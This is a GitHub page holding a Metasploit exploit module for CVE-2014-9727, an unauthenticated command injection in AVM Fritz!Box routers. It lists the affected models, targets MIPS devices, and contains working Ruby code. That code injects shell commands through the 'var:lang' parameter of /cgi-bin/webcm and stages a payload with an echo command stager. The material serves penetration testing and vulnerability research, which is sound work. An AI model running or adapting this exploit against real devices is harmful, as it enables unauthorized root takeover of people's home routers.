-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
fritzbox_echo_exec.rb
115 lines (105 loc) · 3.65 KB
/
fritzbox_echo_exec.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection',
'Description' => %q{
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'Fabian Braeunlein <fabian[at]breaking.systems>', # Metasploit PoC with wget method
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-9727' ],
[ 'OSVDB', '103289' ],
[ 'BID', '65520' ],
[ 'URL', 'http://www.kapple.de/?p=75' ], # vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], # probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], # published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], # vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] # writeup with PoC
],
'DisclosureDate' => 'Feb 11 2014',
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&echo -e \"\\n\\n#{clue}\""
}
})
if res && res.body =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&#{cmd}",
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("Trying to access the vulnerable URL...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("Exploiting...")
execute_cmdstager(
flavor: :echo,
linemax: 92
)
end
end